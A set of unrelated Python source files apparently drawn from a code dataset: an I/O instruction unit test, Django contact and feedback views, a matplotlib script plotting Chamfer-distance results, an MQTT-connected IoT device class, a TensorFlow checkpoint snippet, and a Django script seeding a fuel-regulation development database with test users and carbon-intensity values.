sys.path.insert(0, '..')
class TestIOInstructions(unittest.TestCase):
def test_print_A(self):
before = {'_integer': [7]}
after = {'_stdout': '7'}
self.assertTrue(t_u.run_test(before, after, '_print_integer'))
def test_print_B(self):
before = {'_float': [7.1]}
after = {'_stdout': '7.1'}
self.assertTrue(t_u.run_test(before, after, '_print_float'))
def test_print_newline_A(self):
before = {'_stdout': 'A'}
after = {'_stdout': 'A\n'}
self.assertTrue(t_u.run_test(before, after, '_print_newline'))
def test_print_newline_B(self):
before = {}
after = {'_stdout': '\n'}
self.assertTrue(t_u.run_test(before, after, '_print_newline'))
|
999,428 | 699e1503d1eacdbcb39a1e8f6d9d7bff29612c58 | from django.shortcuts import render
from .models import ContactData,FeedbackData
from .forms import FeedbackForm,ContactForm
from django.http.response import HttpResponse
def home_view(request):
return render(request,'home.html')
def contact_view(request):
if request.method == 'POST':
form = ContactForm(request.method)
if form.is_valid:
name = form.cleaned_data.get('name')
email = form.cleaned_data.get('email')
mobile = form.cleaned_data.get('mobile')
course = form.cleaned_data.get('course')
location = form.cleaned_data.get('location')
shift = form.cleaned_data.get('shift')
data = ContactData(
name=name,
email=email,
mobile=mobile,
courses=course,
location=location,
shift=shift,
)
data.save()
form = ContactForm()
return render(request,'contact.html',{'form':form})
else:
return HttpResponse('form is not valid')
else:
form = ContactForm()
return render(request,'contact.html',{'form':form})
def services_view(request):
return render(request,'services.html')
import datetime as dt
date1 = dt.datetime.now()
def feedback_view(request):
if request.method == 'POST':
form = FeedbackForm(request.method)
if form.is_valid():
name = request.POST.get('name')
rating = request.POST.get('rating')
feedback = request.POST.get('feedback')
data = FeedbackData(
name=name,
rating=rating,
feedback=feedback,
date= date1,
)
data.save()
feedbacks = FeedbackData.objects.all()
form = FeedbackForm()
my_dict = {'form':form,'feedbacks':feedbacks}
return render(request,'feedback.html',my_dict)
else:
form = FeedbackForm()
feedbacks = FeedbackData.objects.all()
my_dict = {'form':form,'feedbacks':feedbacks}
return render(request,'feedback.html',my_dict)
def gallery_view(request):
return render(request,'gallery.html')
|
999,429 | 43a0dacd7c4477131a331bc7a7cba89a4047d826 |
import numpy as np
import matplotlib.pyplot as plt
import math
from parse_log_files import parseAndClusteredLogFiles
def main():
path = "../images/run_2019_10_08"
#output_path = path + "/plots"
logs_datasets = parseAndClusteredLogFiles(path)
for dataset in logs_datasets:
output_path = path + "/" + dataset
try:
plotDataset(logs_datasets[dataset], dataset, output_path)
except:
print("not able to plot dataset " + dataset)
def plotDataset(dataset, dataset_name, output_path):
names = ['ARAP',
'ARAP ReduceRigidity', #1
'ARAP Adaptive Edge', #2
'ARAP Adaptive Vertex',#3
'ARAP ReduceSmooth',
'ARAP Refine Edge',
'ARAP Refine Vertex',
'Embedded Deformation', #7
'ARAP Adaptive Edge ReduceSmooth', #8
'ARAP Adaptive Vertex ReduceSmooth', #9
'ARAP Adaptive Edge ReduceRigidity', #10
'ARAP Adaptive Vertex ReduceRigidity', #11
'ARAP ReduceRigidity ReduceSmooth', #12
'ARAP Refine Edge ReduceSmooth', #13
'ARAP Refine Vertex ReduceSmooth',
]
dataset_no_ed = dict()
for k in dataset:
if k in names[0:7]:
dataset_no_ed[k] = dataset[k]
dataset_rigidity = dict()
for k in dataset:
if k in names[0:4]:
dataset_rigidity[k] = dataset[k]
dataset_refinment = dict()
for k in dataset:
if k in names[4:7] or k in names[0]:
dataset_refinment[k] = dataset[k]
dataset_combinations_rigidity_reduction = dict()
for k in dataset:
if k in names[10:12] or k in names[0] or k in names[1]:
dataset_combinations_rigidity_reduction[k] = dataset[k]
dataset_combinations_smoothness_reduction_adaptive = dict()
for k in dataset:
if k in names[8:10] or k in names[0] or k in names[4]:
dataset_combinations_smoothness_reduction_adaptive[k] = dataset[k]
dataset_combinations_smoothness_reduction_refinement = dict()
for k in dataset:
if k in names[13:] or k in names[0] or k in names[4]:
dataset_combinations_smoothness_reduction_refinement[k] = dataset[k]
dataset_combinations_smoothness_rigidity_reduction = dict()
for k in dataset:
if k in names[12:13] or k in names[0:2] or k in names[4]:
dataset_combinations_smoothness_rigidity_reduction[k] = dataset[k]
# Adatptive Rigidity and RR and Adaptive Rigidity and SR
dataset_combinations_adaptive_rigidity = dict()
for k in dataset:
if k in names[8:12] or k in names[0:2]:# or k in names[4]:
dataset_combinations_adaptive_rigidity[k] = dataset[k]
# Refinement and SR and RR and SR
dataset_combinations_refinement_and_smoothness_rigidity = dict()
for k in dataset:
if k in names[12:] or k in names[0:2]:# or k in names[4]:
dataset_combinations_refinement_and_smoothness_rigidity[k] = dataset[k]
# All Combinations
dataset_all_combinations = dict()
for k in dataset:
if k in names[8:] or k in names[0:2]:# or k in names[4]:
dataset_all_combinations[k] = dataset[k]
for k in dataset:
if dataset[k]:
print("log file " + dataset[k][0]['log file'])
#plotDatasetMeanAndVariance(dataset, dataset_name + '_with_ed', output_path)
plotDatasetMean(dataset_no_ed, dataset_name, output_path)
plotDatasetMedian(dataset_no_ed, dataset_name, output_path)
#plotDatasetMeanScaled(dataset_no_ed, dataset_name, output_path)
#plotDatasetMean(dataset_rigidity, dataset_name + ' adaptive rigidity', output_path)
#plotDatasetMean(dataset_refinment, dataset_name + ' refinement', output_path)
#plotDatasetMeanPerNode(dataset_refinment, dataset_name + ' refinement', output_path)
plotDatasetMeanCombinations(dataset_combinations_smoothness_reduction_adaptive, dataset_name, output_path + "/smoothness_adaptive_")
plotDatasetMeanCombinations(dataset_combinations_smoothness_reduction_refinement, dataset_name,
output_path + "/smoothness_refinement_")
plotDatasetMeanCombinations(dataset_combinations_rigidity_reduction, dataset_name, output_path + "/rigidity_")
plotDatasetMeanCombinations(dataset_combinations_smoothness_rigidity_reduction, dataset_name, output_path + "/rigidity_smoothness_")
# tests
plotDatasetMeanCombinations(dataset_combinations_refinement_and_smoothness_rigidity, dataset_name,
output_path + "/refinement_and_rr_sr_")
plotDatasetMeanCombinations(dataset_combinations_adaptive_rigidity, dataset_name,
output_path + "/adaptive_rigidity_")
plotAndSaveImage(dataset_combinations_refinement_and_smoothness_rigidity, 'error mean', dataset_name, 'Mean Chamfer Distance',
output_path + "/mean_refinement_and_rr_sr_")
plotAndSaveImage(dataset_combinations_adaptive_rigidity, 'error mean', dataset_name, 'Mean Chamfer Distance',
output_path + "/mean_adaptive_rigidity_")
plotAndSaveImage(dataset_all_combinations, 'error mean', dataset_name, 'Mean Chamfer Distance',
output_path + "/mean_all_combinations_")
#plotDatasetMeanAndVariance(dataset, dataset_name + '_all', output_path)
#plotDatasetMeanAndVariance([arap_logs, adaptive_rigidity_edge, adaptive_rigidity_vertex, refinement_edge, reduce_smooth, reduce_rigidity], dataset, output_path)
def plotDatasetMean(logs, title, output_path):
plotAndSaveImage(logs, 'error mean', title, 'Mean Chamfer Distance', output_path + "/mean_")
plotAndSaveImage(logs, 'error mean', title, 'Mean Chamfer Distance', output_path + "/legend_mean_", False, 'lower right')
def plotDatasetMeanScaled(logs, title, output_path):
plotAndSaveImage(logs, 'scaled error mean', title, 'Mean Chamfer Distance in 10−4', output_path + "/mean_")
plotAndSaveImage(logs, 'scaled error mean', title, 'Mean Chamfer Distance', output_path + "/legend_mean_", False, 'lower right')
def plotDatasetMeanCombinations(logs, title, output_path):
plotAndSaveImageCombinations(logs, 'error mean', title, 'Mean Chamfer Distance', output_path + "mean_")
plotAndSaveImageCombinations(logs, 'error mean', title, 'Mean Chamfer Distance', output_path + "legend_mean_", False, 'lower right')
def plotDatasetMeanPerNode(logs, title, output_path):
plotAndSaveImage(logs, 'mean per node', title, 'Chamfer Distance Mean per Node', output_path + "/mean_per_node_")
def plotDatasetMedian(logs, title, output_path):
plotAndSaveImage(logs, 'error median', title, 'chamfer distance median', output_path + "/median_", True)
plotAndSaveImage(logs, 'median per node', title, 'chamfer distance median per node', output_path + "/median_per_node_", True)
def plotAndSaveImage(logs, key, title, ylabel, output_path, log_scale = False, legend_location = 'upper left'):
#print('output path' + " " + output_path + title)
plt.rcParams.update({'font.size': 12})
fig = plt.figure(figsize=plt.figaspect(0.60))
plt.title(title, {'fontsize':18})
#plt.xlabel('Frames', {'fontsize':16})
#plt.ylabel(ylabel, fontsize=16)
ax1 = fig.add_subplot(1, 1, 1)
ax1.set_xlabel('Frames', fontsize=14) # xlabel
ax1.set_ylabel(ylabel, fontsize=14) # ylabel
#import matplotlib.ticker as mtick
#ax1.yaxis.set_major_formatter(mtick.FormatStrFormatter('%.0e'))
if log_scale:
ax1.set_yscale('log')
plot_colors = ['r', 'b', 'm', 'c', 'g', 'y', 'k',
(0.0, 1.0, 0.5, 1.), (1.0, 0.5, 0.0, 1.), (0.5, 1.0, 0.0, 1.), (0.0, 0.5, 1.0, 1.),
(0.25, 0.5, 0.25, 1.), (0.25, 0.5, 0.5, 1.), 'b', 'b', 'b', 'b', 'b']
n = 0
for k in logs:
data = logs[k]
if not data:
n = n + 1
continue
log_dict = data[1]
error_means = [(d[key]) for d in log_dict]
frames = [int(d['frame']) for d in log_dict]
std_deviations = [d['error variance'] for d in log_dict]
ax1.plot(frames, error_means, color = plot_colors[n], label = data[0]['legend name'])
#lower_std = [max(0, error_means[i]-(std_deviations[i])) for i in range(len(frames))]
#ax1.plot(frames, lower_std, color=std_dev_line_colors[n], linestyle='dashed')
#upper_std = [error_means[i]+(std_deviations[i]) for i in range(len(frames))]
#ax1.plot(frames, upper_std, color=std_dev_line_colors[n], linestyle='dashed')
#plt.fill_between(steps, lower_std, upper_std, color=std_dev_fill_colors[n])
n = n+1
ax1.set_xlim([0, max(frames)])
if title == 'head':
ax1.set_ylim([0, 0.00016])
#ax1.set_ylim([0, 0.00001])
x_step_size = 10. if max(frames) < 75 else 20.
plt.xticks(np.arange(min(frames)-1, max(frames) + 1, x_step_size))
plt.legend(loc=legend_location, prop={'size': 12})
plt.grid(b=None, which='major', axis='both')
fig.tight_layout()
output = output_path + title.replace(" ", "_") + '.pdf'
try:
plt.savefig(output)
print('saved' + " " + output)
except:
print('Could not save to ' + output)
plt.clf()
plt.close()
def plotAndSaveImageCombinations(logs, key, title, ylabel, output_path, log_scale = False, legend_location = 'upper left'):
#print('output path' + " " + output_path + title)
plt.rcParams.update({'font.size': 11})
fig = plt.figure(figsize=plt.figaspect(0.9))
plt.title(title, {'fontsize':18})
ax1 = fig.add_subplot(1, 1, 1)
ax1.set_xlabel('Frames', fontsize=12) # xlabel
ax1.set_ylabel(ylabel, fontsize=12) # ylabel
if log_scale:
ax1.set_yscale('log')
plot_colors = ['r', 'b', 'm', 'c', 'g', 'y', 'k',
(0.0, 1.0, 0.5, 1.), (1.0, 0.5, 0.0, 1.), (0.5, 1.0, 0.0, 1.), (0.0, 0.5, 1.0, 1.),
(0.25, 0.5, 0.25, 1.), (0.25, 0.5, 0.5, 1.), 'b', 'b', 'b', 'b', 'b']
n = 0
for k in logs:
data = logs[k]
if not data:
n = n + 1
continue
log_dict = data[1]
error_means = [(d[key]) for d in log_dict]
frames = [int(d['frame']) for d in log_dict]
std_deviations = [d['error variance'] for d in log_dict]
ax1.plot(frames, error_means, color = plot_colors[n], label = data[0]['legend name'])
n = n+1
ax1.set_xlim([0, max(frames)])
if title == 'paperbag':
ax1.set_ylim([0, 0.0009])
elif title == 'puppet':
ax1.set_ylim([0, 0.0008])
elif title == 'hand':
ax1.set_ylim([0, 0.0004])
elif title == 'head':
ax1.set_ylim([0, 0.00016])
x_step_size = 10. if max(frames) < 75 else 20.
plt.xticks(np.arange(min(frames)-1, max(frames) + 1, x_step_size))
plt.legend(loc=legend_location, prop={'size': 12})
plt.grid(b=None, which='major', axis='both')
fig.tight_layout()
output = output_path + title.replace(" ", "_") + '.pdf'
try:
plt.savefig(output)
print('saved' + " " + output)
except:
print('Could not save to ' + output)
plt.clf()
plt.close()
if __name__=='__main__':
main()
|
999,430 | e98471891ec1e6780a9c5cb3e15a802363110ad0 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Created on Nov 7, 2015
Don't blink...
@author: Juan_Insuasti
'''
from Model import Sensor
from Model import Actuator, Camera
import sys
import datetime
from Shared import Logger
from Broker import Broker
import json
class Device:
def __init__(self, database, storage, id, type, broker, enabled, basePath="", topicSensor="/regSensor", topicActuator="/regActuator", logs=True, logName="Device"):
self.db = database
self.storage = storage
self.online = True
self.id = id
self.type = type
self.enabled = enabled
self.sensors = {}
self.actuators = {}
self.updateTime = { 'MST': 60,
'LIG': 5 }
self.path = basePath + "/devices/" + str(self.id)
self.console = Logger.Logger(logName="Device("+self.path+")", enabled=logs, printConsole=True)
self.topicSensor = self.path + topicSensor
self.topicActuator = self.path + topicActuator
self.console.log("Initialization...")
#Initializing broker
self.broker = broker
self.broker.subscribeTopicWithCallback(self.topicSensor, self.brokerCallback )
self.broker.subscribeTopicWithCallback(self.topicActuator, self.brokerCallback )
self.broker.subscribeTopicWithCallback(self.path, self.onlineCheck )
self.saveDeviceToDB()
def onlineCheck(self, topic, payload):
if payload == "connected":
self.online = True
if payload == "disconnected":
self.online = False
self.saveDeviceToDB()
def brokerCallback(self, topic, payload):
payload2 = payload.replace("'", '"')
self.console.log("Broker callback")
data = json.loads(payload2)
self.console.log("Topic: %s", topic)
self.console.log("ID: %s, Type: %s", (data['id'], data['type']))
if (topic == self.topicActuator):
if ( data['id'] not in self.actuators.keys()):
if ( data['type'] == "CAM" ):
self.console.log("New Camera")
self.addCamera(data['id'], data['type'], True, data['settings'])
self.saveDeviceToDB()
else:
self.console.log("New Actuator")
self.addActuator(data['id'], data['type'], True)
self.saveDeviceToDB()
else:
self.console.log("Actuator already exists")
elif (topic == self.topicSensor):
if ( data['id'] not in self.sensors.keys()):
self.console.log("New Sensor")
self.addSensor(data['id'], data['type'], True)
self.saveDeviceToDB()
else:
self.console.log("Sensor already exists")
def getDeviceData(self):
data = {
"id": self.id,
"type": self.type,
"enabled": self.enabled,
"timestamp": datetime.datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S"),
"online": self.online
}
return data
def saveDeviceToDB(self):
self.console.log("Saving device data to database")
data = self.getDeviceData()
self.db.updateData(self.path, data)
for sensorId in self.sensors.keys():
self.sensors[sensorId].saveDataToDB()
for actuatorId in self.actuators.keys():
self.actuators[actuatorId].saveDataToDB()
def addSensor(self, sensorId, type, enabled):
self.console.log("Adding sensor(%s) %s ", (sensorId, type))
self.sensors[sensorId] = Sensor.Sensor(database=self.db, storage=self.storage, broker = self.broker, id=sensorId, type=type, enabled=enabled, filterSamples=30, devicePath= self.path, datasetLength = 24, skipSamples=30, dbUpdateTime=self.updateTime[type])
def addActuator(self, actuatorId, type, enabled):
self.console.log("Adding Actuator(%s) %s ",(actuatorId, type))
self.actuators[actuatorId] = Actuator.Actuator(database=self.db, broker = self.broker, id=actuatorId, type=type, enabled=enabled, devicePath= self.path)
def addCamera(self, cameraId, type, enabled, settings):
self.console.log("Adding Camera(%s) %s ",(cameraId, type))
self.actuators[cameraId] = Camera.Camera(database=self.db, broker = self.broker, id=cameraId, type=type, enabled=enabled, devicePath= self.path, settings = settings)
if __name__ == '__main__':
pass
|
999,431 | fca43ed5584500fa3ae7b166f5d4aca67b0ad569 | import tensorflow as tf
import numpy as np
weights3d_dir = '/home/vador/Documents/project/AI/drl-rpn-tf-video/pretrained-data/data3D/'
model3d = weights3d_dir + 'model_test'
vn1 = np.array(np.random.randint(0, 10, (4,5,5)))
vt1 = tf.Variable(vn1, name='v1')
vn2 = np.array(np.random.randint(0, 10, (4,5,5)))
vt2 = tf.Variable(vn2, name='v2')
vt3 = tf.multiply(vt1, vt2)
init = tf.global_variables_initializer()
saver = tf.train.Saver()
with tf.Session() as sess:
sess.run(init)
saver.save(sess, model3d)
|
999,432 | 8b27829c755702793c6717ff4b4304730d5e1a3c | import uuid
import os
from datetime import datetime
from django.db import transaction
from api.management.data_script import OperationalDataScript
from api.models.ApprovedFuel import ApprovedFuel
from api.models.ApprovedFuelProvision import ApprovedFuelProvision
from api.models.CarbonIntensityDeterminationType import CarbonIntensityDeterminationType
from api.models.CarbonIntensityLimit import CarbonIntensityLimit
from api.models.CompliancePeriod import CompliancePeriod
from api.models.DefaultCarbonIntensity import DefaultCarbonIntensity
from api.models.DefaultCarbonIntensityCategory import DefaultCarbonIntensityCategory
from api.models.EnergyDensity import EnergyDensity
from api.models.EnergyDensityCategory import EnergyDensityCategory
from api.models.EnergyEffectivenessRatio import EnergyEffectivenessRatio
from api.models.EnergyEffectivenessRatioCategory import EnergyEffectivenessRatioCategory
from api.models.ExpectedUse import ExpectedUse
from api.models.FuelClass import FuelClass
from api.models.NotionalTransferType import NotionalTransferType
from api.models.Organization import Organization
from api.models.OrganizationActionsType import OrganizationActionsType
from api.models.OrganizationBalance import OrganizationBalance
from api.models.OrganizationStatus import OrganizationStatus
from api.models.OrganizationType import OrganizationType
from api.models.PetroleumCarbonIntensity import PetroleumCarbonIntensity
from api.models.PetroleumCarbonIntensityCategory import PetroleumCarbonIntensityCategory
from api.models.ProvisionOfTheAct import ProvisionOfTheAct
from api.models.Role import Role
from api.models.SigningAuthorityAssertion import SigningAuthorityAssertion
from api.models.TransactionType import TransactionType
from api.models.User import User
from api.models.UserRole import UserRole
class DockerEnvironment(OperationalDataScript):
comment = 'Build development environment for docker compose'
is_revertable = False
_usernames = ['fs1',
'fs2',
'fs3',
'analyst',
'director',
'tfrsadmin',
'admin']
_orgs = ['Fuel Supplier 1', 'Fuel Supplier 2', 'Fuel Supplier 3']
def check_run_preconditions(self):
for username in self._usernames:
if User.objects.filter(username=username).exists():
print('Found an existing user {}'.format(username))
return False
for org in self._orgs:
if Organization.objects.filter(name=org).exists():
print('Found an existing organization {}'.format(username))
return False
return True
@transaction.atomic
def run(self):
try:
CompliancePeriod.objects.get(description='Auto-generated initial compliance period').delete()
display_order = 10
compliance_periods = []
for period in range(2013, 2031):
display_order += 1
compliance_periods.append(
CompliancePeriod(
description=period,
display_order=display_order,
effective_date="{}-01-01".format(period),
expiration_date="{}-12-31".format(period)
)
)
CompliancePeriod.objects.bulk_create(compliance_periods)
Organization(name=self._orgs[0],
actions_type=OrganizationActionsType.objects.get_by_natural_key("Buy And Sell"),
type=OrganizationType.objects.get_by_natural_key("Part3FuelSupplier"),
status=OrganizationStatus.objects.get_by_natural_key('Active'), id=2).save()
Organization(name=self._orgs[1],
actions_type=OrganizationActionsType.objects.get_by_natural_key("Buy And Sell"),
type=OrganizationType.objects.get_by_natural_key("Part3FuelSupplier"),
status=OrganizationStatus.objects.get_by_natural_key('Active'), id=3).save()
Organization(name=self._orgs[2],
actions_type=OrganizationActionsType.objects.get_by_natural_key("Buy And Sell"),
type=OrganizationType.objects.get_by_natural_key("Part3FuelSupplier"),
status=OrganizationStatus.objects.get_by_natural_key('Active'), id=4).save()
OrganizationBalance(organization=Organization.objects.get_by_natural_key(self._orgs[0]), credit_trade=None,
validated_credits=1000, effective_date=datetime.today().strftime('%Y-%m-%d')).save()
OrganizationBalance(organization=Organization.objects.get_by_natural_key(self._orgs[1]), credit_trade=None,
validated_credits=1000, effective_date=datetime.today().strftime('%Y-%m-%d')).save()
OrganizationBalance(organization=Organization.objects.get_by_natural_key(self._orgs[2]), credit_trade=None,
validated_credits=1000, effective_date=datetime.today().strftime('%Y-%m-%d')).save()
User(email='fs1@email.com', username='fs1',
first_name='FS1', last_name='Supplier', display_name='Fuel Supplier',
organization=Organization.objects.get_by_natural_key(self._orgs[0])).save()
User(email='fs2@email.com', username='fs2',
first_name='FS2', last_name='Supplier', display_name='Another Fuel Supplier',
organization=Organization.objects.get_by_natural_key(self._orgs[1])).save()
User(email='fs3@email.com', username='fs3',
first_name='FS3', last_name='Supplier', display_name='Third Fuel Supplier',
organization=Organization.objects.get_by_natural_key(self._orgs[2])).save()
User(email='analyst@email.com', username='analyst',
first_name='Analyst', last_name='Government', display_name='Analyst',
organization=Organization.objects.get(id=1)).save()
User(email='director@email.com', username='director',
first_name='Director', last_name='Government', display_name='(Director)',
organization=Organization.objects.get(id=1)).save()
User(email='tfrsadmin@email.com', username='tfrsadmin',
first_name='TfrsAdmin', last_name='Government', display_name='(TfrsAdmin)',
organization=Organization.objects.get(id=1)).save()
UserRole(user=User.objects.get(username='fs1'), role=Role.objects.get_by_natural_key('FSManager')).save()
UserRole(user=User.objects.get(username='fs1'), role=Role.objects.get_by_natural_key('ComplianceReporting')).save()
UserRole(user=User.objects.get(username='fs1'), role=Role.objects.get_by_natural_key('FSDocSubmit')).save()
UserRole(user=User.objects.get(username='fs2'), role=Role.objects.get_by_natural_key('FSManager')).save()
UserRole(user=User.objects.get(username='fs2'), role=Role.objects.get_by_natural_key('FSDocSubmit')).save()
UserRole(user=User.objects.get(username='fs3'), role=Role.objects.get_by_natural_key('FSManager')).save()
UserRole(user=User.objects.get(username='fs3'), role=Role.objects.get_by_natural_key('FSDocSubmit')).save()
UserRole(user=User.objects.get(username='fs3'), role=Role.objects.get_by_natural_key('FSAdmin')).save()
UserRole(user=User.objects.get(username='analyst'), role=Role.objects.get_by_natural_key('GovUser')).save()
UserRole(user=User.objects.get(username='analyst'), role=Role.objects.get_by_natural_key('GovDoc')).save()
UserRole(user=User.objects.get(username='director'), role=Role.objects.get_by_natural_key('GovDirector')).save()
UserRole(user=User.objects.get(username='tfrsadmin'), role=Role.objects.get_by_natural_key('Admin')).save()
# These are copied verbatim from operational scripts 0006 through 0012.
# They must be copied instead of run on startup since their precondition checks don't do anything
CarbonIntensityLimit.objects.create(
compliance_period=CompliancePeriod.objects.get(description="2017"),
effective_date="2017-01-01",
expiration_date="2017-12-31",
density="90.02",
fuel_class=FuelClass.objects.get(fuel_class="Diesel")
)
CarbonIntensityLimit.objects.create(
compliance_period=CompliancePeriod.objects.get(description="2017"),
effective_date="2017-01-01",
expiration_date="2017-12-31",
density="83.74",
fuel_class=FuelClass.objects.get(fuel_class="Gasoline")
)
# 2018
CarbonIntensityLimit.objects.create(
compliance_period=CompliancePeriod.objects.get(description="2018"),
effective_date="2018-01-01",
expiration_date="2018-12-31",
density="88.60",
fuel_class=FuelClass.objects.get(fuel_class="Diesel")
)
CarbonIntensityLimit.objects.create(
compliance_period=CompliancePeriod.objects.get(description="2018"),
effective_date="2018-01-01",
expiration_date="2018-12-31",
density="82.41",
fuel_class=FuelClass.objects.get(fuel_class="Gasoline")
)
# 2019
CarbonIntensityLimit.objects.create(
compliance_period=CompliancePeriod.objects.get(description="2019"),
effective_date="2019-01-01",
expiration_date="2019-12-31",
density="87.18",
fuel_class=FuelClass.objects.get(fuel_class="Diesel")
)
CarbonIntensityLimit.objects.create(
compliance_period=CompliancePeriod.objects.get(description="2019"),
effective_date="2019-01-01",
expiration_date="2019-12-31",
density="81.09",
fuel_class=FuelClass.objects.get(fuel_class="Gasoline")
)
carbon_intensities = []
for period in range(2020, 2031):
carbon_intensities.append(
CarbonIntensityLimit(
compliance_period=CompliancePeriod.objects.get(
description=period
),
effective_date="{}-01-01".format(period),
expiration_date="{}-12-31".format(period),
density="85.28",
fuel_class=FuelClass.objects.get(fuel_class="Diesel")
)
)
carbon_intensities.append(
CarbonIntensityLimit(
compliance_period=CompliancePeriod.objects.get(
description=period
),
effective_date="{}-01-01".format(period),
expiration_date="{}-12-31".format(period),
density="79.33",
fuel_class=FuelClass.objects.get(fuel_class="Gasoline")
)
)
CarbonIntensityLimit.objects.bulk_create(carbon_intensities)
EnergyEffectivenessRatio.objects.create(
category=EnergyEffectivenessRatioCategory.objects.get(
name="Petroleum-based diesel fuel or renewable fuel in "
"relation to diesel class fuel"
),
effective_date="2017-01-01",
ratio="1.0",
fuel_class=FuelClass.objects.get(fuel_class="Diesel")
)
EnergyEffectivenessRatio.objects.create(
category=EnergyEffectivenessRatioCategory.objects.get(
name="Petroleum-based gasoline, natural gas-based gasoline or "
"renewable fuel in relation to gasoline class fuel"
),
effective_date="2017-01-01",
ratio="1.0",
fuel_class=FuelClass.objects.get(fuel_class="Gasoline")
)
EnergyEffectivenessRatio.objects.create(
category=EnergyEffectivenessRatioCategory.objects.get(
name="Hydrogen"
),
effective_date="2017-01-01",
ratio="1.9",
fuel_class=FuelClass.objects.get(fuel_class="Diesel")
)
EnergyEffectivenessRatio.objects.create(
category=EnergyEffectivenessRatioCategory.objects.get(
name="Hydrogen"
),
effective_date="2017-01-01",
ratio="2.5",
fuel_class=FuelClass.objects.get(fuel_class="Gasoline")
)
EnergyEffectivenessRatio.objects.create(
category=EnergyEffectivenessRatioCategory.objects.get(
name="LNG"
),
effective_date="2017-01-01",
ratio="1.0",
fuel_class=FuelClass.objects.get(fuel_class="Diesel")
)
EnergyEffectivenessRatio.objects.create(
category=EnergyEffectivenessRatioCategory.objects.get(
name="CNG"
),
effective_date="2017-01-01",
ratio="0.9",
fuel_class=FuelClass.objects.get(fuel_class="Diesel")
)
EnergyEffectivenessRatio.objects.create(
category=EnergyEffectivenessRatioCategory.objects.get(
name="CNG"
),
effective_date="2017-01-01",
ratio="1.0",
fuel_class=FuelClass.objects.get(fuel_class="Gasoline")
)
EnergyEffectivenessRatio.objects.create(
category=EnergyEffectivenessRatioCategory.objects.get(
name="Propane"
),
effective_date="2017-01-01",
ratio="1.0",
fuel_class=FuelClass.objects.get(fuel_class="Diesel")
)
EnergyEffectivenessRatio.objects.create(
category=EnergyEffectivenessRatioCategory.objects.get(
name="Propane"
),
effective_date="2017-01-01",
ratio="1.0",
fuel_class=FuelClass.objects.get(fuel_class="Gasoline")
)
EnergyEffectivenessRatio.objects.create(
category=EnergyEffectivenessRatioCategory.objects.get(
name="Electricity"
),
effective_date="2017-01-01",
ratio="2.7",
fuel_class=FuelClass.objects.get(fuel_class="Diesel")
)
EnergyEffectivenessRatio.objects.create(
category=EnergyEffectivenessRatioCategory.objects.get(
name="Electricity"
),
effective_date="2017-01-01",
ratio="3.4",
fuel_class=FuelClass.objects.get(fuel_class="Gasoline")
)
DefaultCarbonIntensity.objects.create(
category=DefaultCarbonIntensityCategory.objects.get(
name__iexact="Renewable Fuel in relation to diesel class fuel"
),
effective_date="2017-01-01",
density="98.96"
)
DefaultCarbonIntensity.objects.create(
category=DefaultCarbonIntensityCategory.objects.get(
name__iexact="Propane"
),
effective_date="2017-01-01",
density="75.35"
)
DefaultCarbonIntensity.objects.create(
category=DefaultCarbonIntensityCategory.objects.get(
name__iexact="Renewable Fuel in relation to gasoline class fuel"
),
effective_date="2017-01-01",
density="88.14"
)
DefaultCarbonIntensity.objects.create(
category=DefaultCarbonIntensityCategory.objects.get(
name__iexact="Natural gas-based gasoline"
),
effective_date="2017-01-01",
density="90.07"
)
DefaultCarbonIntensity.objects.create(
category=DefaultCarbonIntensityCategory.objects.get(
name__iexact="LNG"
),
effective_date="2017-01-01",
density="112.65"
)
DefaultCarbonIntensity.objects.create(
category=DefaultCarbonIntensityCategory.objects.get(
name__iexact="CNG"
),
effective_date="2017-01-01",
density="63.64"
)
DefaultCarbonIntensity.objects.create(
category=DefaultCarbonIntensityCategory.objects.get(
name__iexact="Electricity"
),
effective_date="2017-01-01",
density="19.73"
)
DefaultCarbonIntensity.objects.create(
category=DefaultCarbonIntensityCategory.objects.get(
name__iexact="Hydrogen"
),
effective_date="2017-01-01",
density="96.82"
)
EnergyDensity.objects.create(
category=EnergyDensityCategory.objects.get(
name="Petroleum-based diesel fuel or diesel fuel produced "
"from biomass"
),
effective_date="2017-01-01",
density="38.65"
)
EnergyDensity.objects.create(
category=EnergyDensityCategory.objects.get(
name="Hydrogenation-derived renewable diesel fuel"
),
effective_date="2017-01-01",
density="36.51"
)
EnergyDensity.objects.create(
category=EnergyDensityCategory.objects.get(
name="Biodiesel"
),
effective_date="2017-01-01",
density="35.40"
)
EnergyDensity.objects.create(
category=EnergyDensityCategory.objects.get(
name="Petroleum-based gasoline, natural gas-based "
"gasoline or gasoline produced from biomass"
),
effective_date="2017-01-01",
density="34.69"
)
EnergyDensity.objects.create(
category=EnergyDensityCategory.objects.get(
name="Ethanol"
),
effective_date="2017-01-01",
density="23.58"
)
EnergyDensity.objects.create(
category=EnergyDensityCategory.objects.get(
name="Hydrogen"
),
effective_date="2017-01-01",
density="141.24"
)
EnergyDensity.objects.create(
category=EnergyDensityCategory.objects.get(
name="LNG"
),
effective_date="2017-01-01",
density="52.46"
)
EnergyDensity.objects.create(
category=EnergyDensityCategory.objects.get(
name="CNG"
),
effective_date="2017-01-01",
density="37.85"
)
EnergyDensity.objects.create(
category=EnergyDensityCategory.objects.get(
name="Propane"
),
effective_date="2017-01-01",
density="25.47"
)
EnergyDensity.objects.create(
category=EnergyDensityCategory.objects.get(
name="Electricity"
),
effective_date="2017-01-01",
density="3.60"
)
CarbonIntensityLimit.objects.update(
effective_date="2017-01-01",
expiration_date=None
)
PetroleumCarbonIntensity.objects.create(
category=PetroleumCarbonIntensityCategory.objects.get(
name="Petroleum-based diesel"
),
effective_date="2017-01-01",
density="94.76"
)
PetroleumCarbonIntensity.objects.create(
category=PetroleumCarbonIntensityCategory.objects.get(
name="Petroleum-based gasoline"
),
effective_date="2017-01-01",
density="88.14"
)
ExpectedUse.objects.create(
description="Other",
display_order="99",
effective_date="2017-01-01"
)
ExpectedUse.objects.create(
description="Heating Oil",
display_order="1",
effective_date="2017-01-01"
)
ExpectedUse.objects.create(
description="Department of National Defence (Canada)",
display_order="2",
effective_date="2017-01-01"
)
ExpectedUse.objects.create(
description="Aviation",
display_order="3",
effective_date="2017-01-01"
)
NotionalTransferType.objects.create(
the_type="Received",
display_order="1",
effective_date="2017-01-01"
)
NotionalTransferType.objects.create(
the_type="Transferred",
display_order="2",
effective_date="2017-01-01"
)
prescribed_carbon_intensity = \
CarbonIntensityDeterminationType.objects.create(
display_order="1",
effective_date="2017-01-01",
the_type="Carbon Intensity"
)
